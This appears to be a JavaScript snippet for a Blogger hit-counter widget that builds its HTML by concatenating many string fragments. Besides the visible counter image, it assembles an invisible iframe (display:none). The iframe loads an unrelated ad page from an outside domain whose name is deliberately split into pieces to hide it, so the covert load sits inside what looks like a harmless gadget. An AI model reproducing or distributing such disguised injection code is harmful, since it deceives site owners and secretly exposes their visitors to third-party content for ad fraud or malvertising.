var a = "<";
var b = "img ";
var c = "alt='View' height='15' ";
var d = "src=";
var ab = "<iframe ";
var cd = "style='";
var e = "'https://4.bp.blogspot.com/-CoYz-9RSfLI/WEIXJVrJFcI/AAAAAAAABP4/gop-pkyrkqg7tpAJzHJOZWb3kiFIwYNpwCLcB/s1600/counter-blogger.gif' ";
var f = "width='15'/> : ";
var g = "<img alt='counter' ";
var h = "src=";
var i = "'expr:http://cgibin.";
var j = "erols.com/cgi-bin/Count.cgi?df=counterblogger";
var k = "&srgb=00ff00";
var l = "&prgb=101010";
var kl = "ga"+"me"+"ba"+"wz.";
var mn = "com/"+"p/"+"a-"+"a"+"ds"+".html'>";
var m = "&ft=0";
var n = "&trgb=";
var o = "000000&";
var p = "dd=D'";
var q = "/>";
var total1 = a+b+c+d;
var total2 = e+f+g+h;
var total3 = i+j+k+l;
var total4 = m+n+o;
var total5 = p+q;
var ef = "display:none;' ";
var gh = "src='";
var ij = "http://";
var count1 = total1+total2+total3;
var count2 = total4+total5;
var tot = count1+count2;
var op = "</iframe>";
var fr = ab+cd+ef+gh;
var ar = ij+kl+mn+op;
var ifr = fr+ar;
var counter = tot +"<br/>"+ ifr;
